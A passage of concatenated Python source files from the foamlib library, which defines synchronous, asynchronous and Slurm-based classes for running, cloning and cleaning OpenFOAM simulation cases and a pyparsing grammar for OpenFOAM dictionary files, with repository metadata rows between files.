dst = self.__mkrundir()
yield self._copytree(self.path, dst, symlinks=True)
return type(self)(dst)
def _clean_calls(self, *, check: bool) -> Generator[Any, None, None]:
script_path = self.__clean_script()
if script_path is not None:
yield self.run([script_path], cpus=0, check=check, log=False)
else:
for p in self.__clean_paths():
if p.is_dir():
yield self._rmtree(p)
else:
p.unlink()
def _clone_calls(
self, dst: Optional[Union["os.PathLike[str]", str]]
) -> Generator[Any, None, Self]:
if dst is None:
dst = self.__mkrundir()
if self.__clean_script() is not None:
yield self.copy(dst)
yield type(self)(dst).clean()
else:
yield self._copytree(
self.path, dst, symlinks=True, ignore=self.__clone_ignore()
)
return type(self)(dst)
def _restore_0_dir_calls(self) -> Generator[Any, None, None]:
yield self._rmtree(self.path / "0", ignore_errors=True)
yield self._copytree(self.path / "0.orig", self.path / "0", symlinks=True)
def _block_mesh_calls(
self, *, check: bool, log: bool
) -> Generator[Any, None, None]:
yield self.run(["blockMesh"], cpus=0, check=check, log=log)
def _decompose_par_calls(
self, *, check: bool, log: bool
) -> Generator[Any, None, None]:
yield self.run(["decomposePar"], cpus=0, check=check, log=log)
def _reconstruct_par_calls(
self, *, check: bool, log: bool
) -> Generator[Any, None, None]:
yield self.run(["reconstructPar"], cpus=0, check=check, log=log)
def _prepare_calls(self, *, check: bool, log: bool) -> Generator[Any, None, None]:
script_path = self.__prepare_script()
if script_path is not None:
yield self.run([script_path], log=log, check=check)
elif (self.path / "system" / "blockMeshDict").is_file():
yield self.block_mesh(check=check, log=log)
def _run_calls(
self,
cmd: Optional[Union[Sequence[Union[str, "os.PathLike[str]"]], str]] = None,
*,
parallel: Optional[bool],
cpus: Optional[int],
check: bool,
log: bool,
**kwargs: Any,
) -> Generator[Any, None, None]:
if cmd is not None:
if parallel:
if cpus is None:
cpus = max(self._nprocessors, 1)
else:
parallel = False
if cpus is None:
cpus = 1
with self.__output(cmd, log=log) as (stdout, stderr):
if parallel:
if isinstance(cmd, str):
cmd = [
"mpiexec",
"-n",
str(cpus),
"/bin/sh",
"-c",
f"{cmd} -parallel",
]
else:
cmd = ["mpiexec", "-n", str(cpus), *cmd, "-parallel"]
yield self._run(
cmd,
cpus=cpus,
check=check,
cwd=self.path,
env=self.__env(shell=isinstance(cmd, str)),
stdout=stdout,
stderr=stderr,
**kwargs,
)
else:
script_path = self.__run_script(parallel=parallel)
if script_path is not None:
if parallel or parallel is None:
if cpus is None:
if self._nprocessors > 0:
cpus = self._nprocessors
elif (self.path / "system" / "decomposeParDict").is_file():
cpus = self._nsubdomains
else:
cpus = 1
else:
if cpus is None:
cpus = 1
yield self.run(
[script_path], parallel=False, cpus=cpus, check=check, **kwargs
)
else:
yield self._prepare(check=check, log=log)
if not self and (self.path / "0.orig").is_dir():
yield self.restore_0_dir()
if parallel is None:
parallel = (
(cpus is not None and cpus > 1)
or self._nprocessors > 0
or (self.path / "system" / "decomposeParDict").is_file()
)
if parallel:
if (
self._nprocessors == 0
and (self.path / "system" / "decomposeParDict").is_file()
):
yield self.decompose_par(check=check)
if cpus is None:
cpus = max(self._nprocessors, 1)
else:
if cpus is None:
cpus = 1
yield self.run(
[self.application],
parallel=parallel,
cpus=cpus,
check=check,
**kwargs,
)
| 14,725 | Python | .py | 383 | 26.637076 | 116 | 0.525172 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,138 | _util.py | gerlero_foamlib/foamlib/_cases/_util.py | import functools
import sys
from types import TracebackType
from typing import (
Any,
AsyncContextManager,
Callable,
Generic,
Optional,
Type,
TypeVar,
)
if sys.version_info >= (3, 9):
from collections.abc import Generator
else:
from typing import Generator
Y = TypeVar("Y")
S = TypeVar("S")
R = TypeVar("R")
class ValuedGenerator(Generic[Y, S, R]):
def __init__(self, generator: Generator[Y, S, R]):
self._generator = generator
def __iter__(self) -> Generator[Y, S, R]:
self.value = yield from self._generator
return self.value
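# Illustrative sketch of the intended pattern; the wrapped generator is
# hypothetical:
#
#   calls = ValuedGenerator(some_generator())
#   for item in calls:
#       ...
#   result = calls.value   # the generator's return value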
class _AwaitableAsyncContextManager(Generic[R]):
def __init__(self, cm: "AsyncContextManager[R]"):
self._cm = cm
def __await__(self) -> Generator[Any, Any, R]:
return self._cm.__aenter__().__await__()
async def __aenter__(self) -> R:
return await self._cm.__aenter__()
async def __aexit__(
self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType],
) -> Optional[bool]:
return await self._cm.__aexit__(exc_type, exc_val, exc_tb)
def awaitableasynccontextmanager(
cm: Callable[..., "AsyncContextManager[R]"],
) -> Callable[..., _AwaitableAsyncContextManager[R]]:
@functools.wraps(cm)
def f(*args: Any, **kwargs: Any) -> _AwaitableAsyncContextManager[R]:
return _AwaitableAsyncContextManager(cm(*args, **kwargs))
return f
| 1,493 | Python | .py | 46 | 27.326087 | 73 | 0.64829 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,139 | __init__.py | gerlero_foamlib/foamlib/_cases/__init__.py | from ._async import AsyncFoamCase
from ._base import FoamCaseBase
from ._run import FoamCaseRunBase
from ._slurm import AsyncSlurmFoamCase
from ._subprocess import CalledProcessError
from ._sync import FoamCase
__all__ = [
"AsyncFoamCase",
"FoamCaseBase",
"FoamCaseRunBase",
"AsyncSlurmFoamCase",
"CalledProcessError",
"FoamCase",
]
| 358 | Python | .py | 14 | 22.785714 | 43 | 0.763848 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,140 | _async.py | gerlero_foamlib/foamlib/_cases/_async.py | import asyncio
import multiprocessing
import sys
from contextlib import asynccontextmanager
from typing import TYPE_CHECKING, Any, Callable, Optional, TypeVar, Union, overload
if sys.version_info >= (3, 9):
from collections.abc import (
AsyncGenerator,
Awaitable,
Collection,
Iterable,
Sequence,
)
else:
from typing import AsyncGenerator, Awaitable, Collection, Iterable, Sequence
if sys.version_info >= (3, 11):
from typing import Self
else:
from typing_extensions import Self
import aioshutil
from .._files import FoamFieldFile
from ._base import FoamCaseBase
from ._run import FoamCaseRunBase
from ._subprocess import run_async
from ._util import ValuedGenerator, awaitableasynccontextmanager
if TYPE_CHECKING:
import os
X = TypeVar("X")
Y = TypeVar("Y")
class AsyncFoamCase(FoamCaseRunBase):
"""
An OpenFOAM case with asynchronous support.
Provides methods for running and cleaning cases, as well as accessing files.
Access the time directories of the case as a sequence, e.g. `case[0]` or `case[-1]`.
:param path: The path to the case directory.
"""
class TimeDirectory(FoamCaseRunBase.TimeDirectory):
@property
def _case(self) -> "AsyncFoamCase":
return AsyncFoamCase(self.path.parent)
async def cell_centers(self) -> FoamFieldFile:
"""Write and return the cell centers."""
calls = ValuedGenerator(self._cell_centers_calls())
for coro in calls:
await coro
return calls.value
max_cpus = multiprocessing.cpu_count()
"""
Maximum number of CPUs to use for running instances of `AsyncFoamCase` concurrently.
Defaults to the number of CPUs on the system.
"""
_reserved_cpus = 0
_cpus_cond = asyncio.Condition()
@staticmethod
@asynccontextmanager
async def _cpus(cpus: int) -> AsyncGenerator[None, None]:
cpus = min(cpus, AsyncFoamCase.max_cpus)
if cpus > 0:
async with AsyncFoamCase._cpus_cond:
await AsyncFoamCase._cpus_cond.wait_for(
lambda: AsyncFoamCase.max_cpus - AsyncFoamCase._reserved_cpus
>= cpus
)
AsyncFoamCase._reserved_cpus += cpus
try:
yield
finally:
if cpus > 0:
async with AsyncFoamCase._cpus_cond:
AsyncFoamCase._reserved_cpus -= cpus
AsyncFoamCase._cpus_cond.notify(cpus)
@staticmethod
async def _run(
cmd: Union[Sequence[Union[str, "os.PathLike[str]"]], str],
*,
cpus: int,
**kwargs: Any,
) -> None:
async with AsyncFoamCase._cpus(cpus):
await run_async(cmd, **kwargs)
@staticmethod
async def _rmtree(
path: Union["os.PathLike[str]", str], ignore_errors: bool = False
) -> None:
await aioshutil.rmtree(path, ignore_errors=ignore_errors)
@staticmethod
async def _copytree(
src: Union["os.PathLike[str]", str],
dest: Union["os.PathLike[str]", str],
*,
symlinks: bool = False,
ignore: Optional[
Callable[[Union["os.PathLike[str]", str], Collection[str]], Collection[str]]
] = None,
) -> None:
await aioshutil.copytree(src, dest, symlinks=symlinks, ignore=ignore)
async def clean(self, *, check: bool = False) -> None:
"""
Clean this case.
:param check: If True, raise a CalledProcessError if the clean script returns a non-zero exit code.
"""
for coro in self._clean_calls(check=check):
await coro
@overload
def __getitem__(
self, index: Union[int, float, str]
) -> "AsyncFoamCase.TimeDirectory": ...
@overload
def __getitem__(self, index: slice) -> Sequence["AsyncFoamCase.TimeDirectory"]: ...
def __getitem__(
self, index: Union[int, slice, float, str]
) -> Union["AsyncFoamCase.TimeDirectory", Sequence["AsyncFoamCase.TimeDirectory"]]:
ret = super().__getitem__(index)
if isinstance(ret, FoamCaseBase.TimeDirectory):
return AsyncFoamCase.TimeDirectory(ret)
return [AsyncFoamCase.TimeDirectory(r) for r in ret]
async def _prepare(self, *, check: bool = True, log: bool = True) -> None:
for coro in self._prepare_calls(check=check, log=log):
await coro
async def run(
self,
cmd: Optional[Union[Sequence[Union[str, "os.PathLike[str]"]], str]] = None,
*,
parallel: Optional[bool] = None,
cpus: Optional[int] = None,
check: bool = True,
log: bool = True,
) -> None:
"""
Run this case, or a specified command in the context of this case.
:param cmd: The command to run. If None, run the case. If a sequence, the first element is the command and the rest are arguments. If a string, `cmd` is executed in a shell.
:param parallel: If True, run in parallel using MPI. If None, autodetect whether to run in parallel.
:param cpus: The number of CPUs to use. If None, autodetect according to the case.
:param check: If True, raise a CalledProcessError if any command returns a non-zero exit code.
:param log: If True, log the command output to a file.
"""
for coro in self._run_calls(
cmd=cmd, parallel=parallel, cpus=cpus, check=check, log=log
):
await coro
async def block_mesh(self, *, check: bool = True, log: bool = True) -> None:
"""Run blockMesh on this case."""
for coro in self._block_mesh_calls(check=check, log=log):
await coro
async def decompose_par(self, *, check: bool = True, log: bool = True) -> None:
"""Decompose this case for parallel running."""
for coro in self._decompose_par_calls(check=check, log=log):
await coro
async def reconstruct_par(self, *, check: bool = True, log: bool = True) -> None:
"""Reconstruct this case after parallel running."""
for coro in self._reconstruct_par_calls(check=check, log=log):
await coro
async def restore_0_dir(self) -> None:
"""Restore the 0 directory from the 0.orig directory."""
for coro in self._restore_0_dir_calls():
await coro
@awaitableasynccontextmanager
@asynccontextmanager
async def copy(
self, dst: Optional[Union["os.PathLike[str]", str]] = None
) -> AsyncGenerator[Self, None]:
"""
Make a copy of this case.
Use as an async context manager to automatically delete the copy when done.
        :param dst: The destination path. If None, copy to `$FOAM_RUN/foamlib`.
"""
calls = ValuedGenerator(self._copy_calls(dst))
for coro in calls:
await coro
yield calls.value
await self._rmtree(calls.value.path)
@awaitableasynccontextmanager
@asynccontextmanager
async def clone(
self, dst: Optional[Union["os.PathLike[str]", str]] = None
) -> AsyncGenerator[Self, None]:
"""
Clone this case (make a clean copy).
Use as an async context manager to automatically delete the clone when done.
:param dst: The destination path. If None, clone to `$FOAM_RUN/foamlib`.
"""
calls = ValuedGenerator(self._clone_calls(dst))
for coro in calls:
await coro
yield calls.value
await self._rmtree(calls.value.path)
@staticmethod
def map(coro: Callable[[X], Awaitable[Y]], iterable: Iterable[X]) -> Iterable[Y]:
"""Run an async function on each element of an iterable concurrently."""
return asyncio.get_event_loop().run_until_complete(
asyncio.gather(*(coro(arg) for arg in iterable))
)
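# Illustrative usage sketch; the case path is hypothetical and assumes the
# FoamFieldFile API for reading fields:
#
#   async def main():
#       async with AsyncFoamCase("pitzDaily").clone() as case:
#           await case.run()
#           print(case[-1]["U"].internal_field)
#
#   asyncio.run(main())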
| 7,920 | Python | .py | 192 | 33.041667 | 181 | 0.632148 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,141 | _sync.py | gerlero_foamlib/foamlib/_cases/_sync.py | import shutil
import sys
from types import TracebackType
from typing import TYPE_CHECKING, Any, Callable, Optional, Type, Union, overload
if sys.version_info >= (3, 9):
from collections.abc import Collection, Sequence
else:
from typing import Collection, Sequence
if sys.version_info >= (3, 11):
from typing import Self
else:
from typing_extensions import Self
from .._files import FoamFieldFile
from ._base import FoamCaseBase
from ._run import FoamCaseRunBase
from ._subprocess import run_sync
from ._util import ValuedGenerator
if TYPE_CHECKING:
import os
class FoamCase(FoamCaseRunBase):
"""
An OpenFOAM case.
Provides methods for running and cleaning cases, as well as accessing files.
Access the time directories of the case as a sequence, e.g. `case[0]` or `case[-1]`.
:param path: The path to the case directory.
"""
class TimeDirectory(FoamCaseRunBase.TimeDirectory):
@property
def _case(self) -> "FoamCase":
return FoamCase(self.path.parent)
def cell_centers(self) -> FoamFieldFile:
"""Write and return the cell centers."""
calls = ValuedGenerator(self._cell_centers_calls())
for _ in calls:
pass
return calls.value
@staticmethod
def _run(
cmd: Union[Sequence[Union[str, "os.PathLike[str]"]], str],
*,
cpus: int,
**kwargs: Any,
) -> None:
run_sync(cmd, **kwargs)
@staticmethod
def _rmtree(
path: Union["os.PathLike[str]", str], *, ignore_errors: bool = False
) -> None:
shutil.rmtree(path, ignore_errors=ignore_errors)
@staticmethod
def _copytree(
src: Union["os.PathLike[str]", str],
dest: Union["os.PathLike[str]", str],
*,
symlinks: bool = False,
ignore: Optional[
Callable[[Union["os.PathLike[str]", str], Collection[str]], Collection[str]]
] = None,
) -> None:
shutil.copytree(src, dest, symlinks=symlinks, ignore=ignore)
@overload
def __getitem__(
self, index: Union[int, float, str]
) -> "FoamCase.TimeDirectory": ...
@overload
def __getitem__(self, index: slice) -> Sequence["FoamCase.TimeDirectory"]: ...
def __getitem__(
self, index: Union[int, slice, float, str]
) -> Union["FoamCase.TimeDirectory", Sequence["FoamCase.TimeDirectory"]]:
ret = super().__getitem__(index)
if isinstance(ret, FoamCaseBase.TimeDirectory):
return FoamCase.TimeDirectory(ret)
return [FoamCase.TimeDirectory(r) for r in ret]
def __enter__(self) -> Self:
return self
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType],
) -> None:
self._rmtree(self.path)
def clean(self, *, check: bool = False) -> None:
"""
Clean this case.
:param check: If True, raise a CalledProcessError if the clean script returns a non-zero exit code.
"""
for _ in self._clean_calls(check=check):
pass
def _prepare(self, *, check: bool = True, log: bool = True) -> None:
for _ in self._prepare_calls(check=check, log=log):
pass
def run(
self,
cmd: Optional[Union[Sequence[Union[str, "os.PathLike[str]"]], str]] = None,
*,
parallel: Optional[bool] = None,
cpus: Optional[int] = None,
check: bool = True,
log: bool = True,
) -> None:
"""
Run this case, or a specified command in the context of this case.
:param cmd: The command to run. If None, run the case. If a sequence, the first element is the command and the rest are arguments. If a string, `cmd` is executed in a shell.
:param parallel: If True, run in parallel using MPI. If None, autodetect whether to run in parallel.
:param cpus: The number of CPUs to use. If None, autodetect according to the case.
:param check: If True, raise a CalledProcessError if any command returns a non-zero exit code.
:param log: If True, log the command output to a file.
"""
for _ in self._run_calls(
cmd=cmd, parallel=parallel, cpus=cpus, check=check, log=log
):
pass
def block_mesh(self, *, check: bool = True, log: bool = True) -> None:
"""Run blockMesh on this case."""
for _ in self._block_mesh_calls(check=check, log=log):
pass
def decompose_par(self, *, check: bool = True, log: bool = True) -> None:
"""Decompose this case for parallel running."""
for _ in self._decompose_par_calls(check=check, log=log):
pass
def reconstruct_par(self, *, check: bool = True, log: bool = True) -> None:
"""Reconstruct this case after parallel running."""
for _ in self._reconstruct_par_calls(check=check, log=log):
pass
def restore_0_dir(self) -> None:
"""Restore the 0 directory from the 0.orig directory."""
for _ in self._restore_0_dir_calls():
pass
def copy(self, dst: Optional[Union["os.PathLike[str]", str]] = None) -> Self:
"""
Make a copy of this case.
Use as a context manager to automatically delete the copy when done.
        :param dst: The destination path. If None, copy to `$FOAM_RUN/foamlib`.
"""
calls = ValuedGenerator(self._copy_calls(dst))
for _ in calls:
pass
return calls.value
def clone(self, dst: Optional[Union["os.PathLike[str]", str]] = None) -> Self:
"""
Clone this case (make a clean copy).
Use as a context manager to automatically delete the clone when done.
:param dst: The destination path. If None, clone to `$FOAM_RUN/foamlib`.
"""
calls = ValuedGenerator(self._clone_calls(dst))
for _ in calls:
pass
return calls.value
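# A minimal usage sketch; the case path is hypothetical and an existing OpenFOAM case
# directory is assumed.
def _example_usage() -> None:
    case = FoamCase("path/to/case")  # hypothetical path
    with case.clone() as clone:  # the clone is deleted when the block exits
        clone.run(parallel=False)  # run the case
        latest = clone[-1]  # latest time directory
        print(latest.time, latest["U"].internal_field)  # assumes a "U" field was written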
| 6,049 | Python | .py | 149 | 32.724832 | 181 | 0.618259 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,142 | _slurm.py | gerlero_foamlib/foamlib/_cases/_slurm.py | import shutil
import sys
from typing import TYPE_CHECKING, Any, Optional, Union
if sys.version_info >= (3, 9):
from collections.abc import Sequence
else:
from typing import Sequence
from ._async import AsyncFoamCase
from ._subprocess import run_async
if TYPE_CHECKING:
import os
class AsyncSlurmFoamCase(AsyncFoamCase):
"""An asynchronous OpenFOAM case that launches jobs on a Slurm cluster."""
@staticmethod
async def _run(
cmd: Union[Sequence[Union[str, "os.PathLike[str]"]], str],
*,
cpus: int,
fallback: bool = False,
**kwargs: Any,
) -> None:
if fallback and shutil.which("salloc") is None:
await AsyncFoamCase._run(cmd, cpus=cpus, **kwargs)
return
if cpus >= 1:
if isinstance(cmd, str):
cmd = ["/bin/sh", "-c", cmd]
if cpus == 1:
cmd = ["srun", *cmd]
cmd = ["salloc", "-n", str(cpus), "--job-name", "foamlib", *cmd]
await run_async(cmd, **kwargs)
async def run(
self,
cmd: Optional[Union[Sequence[Union[str, "os.PathLike[str]"]], str]] = None,
*,
parallel: Optional[bool] = None,
cpus: Optional[int] = None,
check: bool = True,
log: bool = True,
fallback: bool = False,
) -> None:
"""
Run this case, or a specified command in the context of this case.
:param cmd: The command to run. If None, run the case. If a sequence, the first element is the command and the rest are arguments. If a string, `cmd` is executed in a shell.
:param parallel: If True, run in parallel using MPI. If None, autodetect whether to run in parallel.
:param cpus: The number of CPUs to use. If None, autodetect according to the case. If 0, run locally.
:param check: If True, raise a CalledProcessError if any command returns a non-zero exit code.
:param log: If True, log the command output to a file.
:param fallback: If True, fall back to running the command locally if Slurm is not available.
"""
for coro in self._run_calls(
cmd=cmd,
parallel=parallel,
cpus=cpus,
check=check,
log=log,
fallback=fallback,
):
await coro
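# A minimal usage sketch; the case path is hypothetical, and a Slurm cluster
# (salloc/srun on PATH) is assumed. With fallback=True the commands run locally
# if Slurm is not available.
async def _example_usage() -> None:
    case = AsyncSlurmFoamCase("path/to/case")  # hypothetical path
    async with case.clone() as clone:
        await clone.run(fallback=True)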
| 2,346 | Python | .py | 59 | 31.305085 | 181 | 0.604396 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,143 | _base.py | gerlero_foamlib/foamlib/_cases/_base.py | import shutil
import sys
from pathlib import Path
from typing import (
TYPE_CHECKING,
Optional,
Union,
overload,
)
if sys.version_info >= (3, 9):
from collections.abc import (
Iterator,
Sequence,
Set,
)
else:
from typing import AbstractSet as Set
from typing import (
Iterator,
Sequence,
)
from .._files import FoamFieldFile, FoamFile
if TYPE_CHECKING:
import os
class FoamCaseBase(Sequence["FoamCaseBase.TimeDirectory"]):
def __init__(self, path: Union["os.PathLike[str]", str] = Path()):
self.path = Path(path).absolute()
class TimeDirectory(Set[FoamFieldFile]):
"""
An OpenFOAM time directory in a case.
Use to access field files in the directory, e.g. `time["U"]`.
:param path: The path to the time directory.
"""
def __init__(self, path: Union["os.PathLike[str]", str]):
self.path = Path(path).absolute()
@property
def _case(self) -> "FoamCaseBase":
return FoamCaseBase(self.path.parent)
@property
def time(self) -> float:
"""The time that corresponds to this directory."""
return float(self.path.name)
@property
def name(self) -> str:
"""The name of this time directory."""
return self.path.name
def __getitem__(self, key: str) -> FoamFieldFile:
if (self.path / f"{key}.gz").is_file() and not (self.path / key).is_file():
return FoamFieldFile(self.path / f"{key}.gz")
return FoamFieldFile(self.path / key)
def __contains__(self, obj: object) -> bool:
if isinstance(obj, FoamFieldFile):
return obj.path.parent == self.path and obj.path.is_file()
if isinstance(obj, str):
return (self.path / obj).is_file() or (
self.path / f"{obj}.gz"
).is_file()
return False
def __iter__(self) -> Iterator[FoamFieldFile]:
for p in self.path.iterdir():
if p.is_file() and (
p.suffix != ".gz" or not p.with_suffix("").is_file()
):
yield FoamFieldFile(p)
def __len__(self) -> int:
return len(list(iter(self)))
def __delitem__(self, key: str) -> None:
if (self.path / f"{key}.gz").is_file() and not (self.path / key).is_file():
(self.path / f"{key}.gz").unlink()
else:
(self.path / key).unlink()
def __fspath__(self) -> str:
return str(self.path)
def __repr__(self) -> str:
return f"{type(self).__qualname__}('{self.path}')"
def __str__(self) -> str:
return str(self.path)
@property
def _times(self) -> Sequence["FoamCaseBase.TimeDirectory"]:
times = []
for p in self.path.iterdir():
if p.is_dir():
try:
float(p.name)
except ValueError:
pass
else:
times.append(FoamCaseBase.TimeDirectory(p))
times.sort(key=lambda t: t.time)
return times
@overload
def __getitem__(
self, index: Union[int, float, str]
) -> "FoamCaseBase.TimeDirectory": ...
@overload
def __getitem__(self, index: slice) -> Sequence["FoamCaseBase.TimeDirectory"]: ...
def __getitem__(
self, index: Union[int, slice, float, str]
) -> Union["FoamCaseBase.TimeDirectory", Sequence["FoamCaseBase.TimeDirectory"]]:
if isinstance(index, str):
return FoamCaseBase.TimeDirectory(self.path / index)
if isinstance(index, float):
for time in self._times:
if time.time == index:
return time
raise IndexError(f"Time {index} not found")
return self._times[index]
def __len__(self) -> int:
return len(self._times)
def __delitem__(self, key: Union[int, float, str]) -> None:
shutil.rmtree(self[key].path)
@property
def name(self) -> str:
"""The name of the case."""
return self.path.name
def file(self, path: Union["os.PathLike[str]", str]) -> FoamFile:
"""Return a FoamFile object for the given path in the case."""
return FoamFile(self.path / path)
@property
def _nsubdomains(self) -> Optional[int]:
"""Return the number of subdomains as set in the decomposeParDict, or None if no decomposeParDict is found."""
try:
nsubdomains = self.decompose_par_dict["numberOfSubdomains"]
if not isinstance(nsubdomains, int):
raise TypeError(
f"numberOfSubdomains in {self.decompose_par_dict} is not an integer"
)
return nsubdomains
except FileNotFoundError:
return None
@property
def _nprocessors(self) -> int:
"""Return the number of processor directories in the case."""
return len(list(self.path.glob("processor*")))
@property
def application(self) -> str:
"""The application name as set in the controlDict."""
application = self.control_dict["application"]
if not isinstance(application, str):
raise TypeError(f"application in {self.control_dict} is not a string")
return application
@property
def control_dict(self) -> FoamFile:
"""The controlDict file."""
return self.file("system/controlDict")
@property
def fv_schemes(self) -> FoamFile:
"""The fvSchemes file."""
return self.file("system/fvSchemes")
@property
def fv_solution(self) -> FoamFile:
"""The fvSolution file."""
return self.file("system/fvSolution")
@property
def decompose_par_dict(self) -> FoamFile:
"""The decomposeParDict file."""
return self.file("system/decomposeParDict")
@property
def block_mesh_dict(self) -> FoamFile:
"""The blockMeshDict file."""
return self.file("system/blockMeshDict")
@property
def transport_properties(self) -> FoamFile:
"""The transportProperties file."""
return self.file("constant/transportProperties")
@property
def turbulence_properties(self) -> FoamFile:
"""The turbulenceProperties file."""
return self.file("constant/turbulenceProperties")
def __fspath__(self) -> str:
return str(self.path)
def __repr__(self) -> str:
return f"{type(self).__qualname__}('{self.path}')"
def __str__(self) -> str:
return str(self.path)
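# A minimal usage sketch; the case path is hypothetical. Normally one instantiates
# FoamCase or AsyncFoamCase, which build on this base class.
def _example_usage() -> None:
    case = FoamCaseBase("path/to/case")  # hypothetical path
    print(case.application)  # read from system/controlDict
    for time_dir in case:  # time directories, sorted by time
        print(time_dir.time, [field.path.name for field in time_dir])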
| 6,733 | Python | .py | 175 | 29 | 118 | 0.576516 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,144 | _parsing.py | gerlero_foamlib/foamlib/_files/_parsing.py | import array
import sys
from typing import Tuple, Union, cast
if sys.version_info >= (3, 9):
from collections.abc import Iterator, Mapping, MutableMapping, Sequence
else:
from typing import Iterator, Mapping, MutableMapping, Sequence
if sys.version_info >= (3, 10):
from types import EllipsisType
else:
from typing import Any as EllipsisType
from pyparsing import (
CharsNotIn,
Combine,
Dict,
Forward,
Group,
Keyword,
LineEnd,
Literal,
Located,
Opt,
ParserElement,
ParseResults,
QuotedString,
Word,
c_style_comment,
common,
counted_array,
cpp_style_comment,
identchars,
printables,
)
from ._base import FoamFileBase
def _list_of(entry: ParserElement) -> ParserElement:
return Opt(
Literal("List") + Literal("<") + common.identifier + Literal(">")
).suppress() + (
(
counted_array(entry, common.integer + Literal("(").suppress())
+ Literal(")").suppress()
).set_parse_action(lambda tks: [tks.as_list()])
| (
Literal("(").suppress()
+ Group((entry)[...], aslist=True)
+ Literal(")").suppress()
)
| (
common.integer + Literal("{").suppress() + entry + Literal("}").suppress()
).set_parse_action(lambda tks: [[tks[1]] * tks[0]])
)
def _keyword_entry_of(
keyword: ParserElement,
data_entries: ParserElement,
*,
located: bool = False,
) -> ParserElement:
subdict = Forward()
keyword_entry = keyword + (
(Literal("{").suppress() + subdict + Literal("}").suppress())
| (data_entries + Literal(";").suppress())
)
if located:
keyword_entry = Located(keyword_entry)
subdict <<= Dict(Group(keyword_entry)[...], asdict=not located)
return keyword_entry
def _unpack_binary_field(
tks: ParseResults,
) -> Sequence[Union[Sequence[float], Sequence[Sequence[float]]]]:
elsize = len(tks[0]) // 8
arr = array.array("d", "".join(tks).encode("latin-1"))
all: Union[Sequence[float], Sequence[Sequence[float]]]
if elsize != 1:
all = [arr[i : i + elsize].tolist() for i in range(0, len(arr), elsize)]
else:
all = arr.tolist()
return [all]
_IDENTCHARS = identchars + "$"
_IDENTBODYCHARS = (
printables.replace(";", "")
.replace("{", "")
.replace("}", "")
.replace("[", "")
.replace("]", "")
)
_SWITCH = (
Keyword("yes", _IDENTBODYCHARS)
| Keyword("true", _IDENTBODYCHARS)
| Keyword("on", _IDENTBODYCHARS)
| Keyword("y", _IDENTBODYCHARS)
| Keyword("t", _IDENTBODYCHARS)
).set_parse_action(lambda: True) | (
Keyword("no", _IDENTBODYCHARS)
| Keyword("false", _IDENTBODYCHARS)
| Keyword("off", _IDENTBODYCHARS)
| Keyword("n", _IDENTBODYCHARS)
| Keyword("f", _IDENTBODYCHARS)
).set_parse_action(lambda: False)
_DIMENSIONS = (
Literal("[").suppress() + common.number[0, 7] + Literal("]").suppress()
).set_parse_action(lambda tks: FoamFileBase.DimensionSet(*tks))
_TENSOR = _list_of(common.number) | common.number
_IDENTIFIER = Combine(
Word(_IDENTCHARS, _IDENTBODYCHARS, exclude_chars="()")
+ Opt(Literal("(") + Word(_IDENTBODYCHARS, exclude_chars="()") + Literal(")"))
)
_DIMENSIONED = (Opt(_IDENTIFIER) + _DIMENSIONS + _TENSOR).set_parse_action(
lambda tks: FoamFileBase.Dimensioned(*reversed(tks.as_list()))
)
_FIELD = (Keyword("uniform").suppress() + _TENSOR) | (
Keyword("nonuniform").suppress()
+ (
_list_of(_TENSOR)
| (
Literal("List").suppress()
+ Literal("<").suppress()
+ (
counted_array(
CharsNotIn(exact=8),
Literal("scalar").suppress()
+ Literal(">").suppress()
+ common.integer
+ Literal("(").suppress(),
)
| counted_array(
CharsNotIn(exact=8 * 3),
Literal("vector").suppress()
+ Literal(">").suppress()
+ common.integer
+ Literal("(").suppress(),
)
| counted_array(
CharsNotIn(exact=8 * 6),
Literal("symmTensor").suppress()
+ Literal(">").suppress()
+ common.integer
+ Literal("(").suppress(),
)
| counted_array(
CharsNotIn(exact=8 * 9),
Literal("tensor").suppress()
+ Literal(">").suppress()
+ common.integer
+ Literal("(").suppress(),
)
)
+ Literal(")").suppress()
).set_parse_action(_unpack_binary_field)
)
)
_TOKEN = QuotedString('"', unquote_results=False) | _IDENTIFIER
_DATA = Forward()
_KEYWORD = _TOKEN | _list_of(_IDENTIFIER).set_parse_action(
lambda tks: "(" + " ".join(tks[0]) + ")"
)
_KEYWORD_ENTRY = Dict(Group(_keyword_entry_of(_KEYWORD, _DATA)), asdict=True)
_DATA_ENTRY = Forward()
_LIST_ENTRY = _KEYWORD_ENTRY | _DATA_ENTRY
_LIST = _list_of(_LIST_ENTRY)
_DATA_ENTRY <<= (
_FIELD | _LIST | _DIMENSIONED | _DIMENSIONS | common.number | _SWITCH | _TOKEN
)
_DATA <<= _DATA_ENTRY[1, ...].set_parse_action(
lambda tks: tuple(tks) if len(tks) > 1 else [tks[0]]
)
_FILE = (
Dict(
Group(_keyword_entry_of(_KEYWORD, Opt(_DATA, default=""), located=True))[...]
+ Opt(
Group(
Located(
_DATA_ENTRY[1, ...].set_parse_action(
lambda tks: [None, tuple(tks) if len(tks) > 1 else tks[0]]
)
)
)
)
+ Group(_keyword_entry_of(_KEYWORD, Opt(_DATA, default=""), located=True))[...]
)
.ignore(c_style_comment)
.ignore(cpp_style_comment)
.ignore(Literal("#include") + ... + LineEnd()) # type: ignore [no-untyped-call]
.parse_with_tabs()
)
class Parsed(Mapping[Tuple[str, ...], Union[FoamFileBase.Data, EllipsisType]]):
def __init__(self, contents: bytes) -> None:
self._parsed: MutableMapping[
Tuple[str, ...],
Tuple[int, Union[FoamFileBase.Data, EllipsisType], int],
] = {}
self._end = len(contents)
for parse_result in _FILE.parse_string(
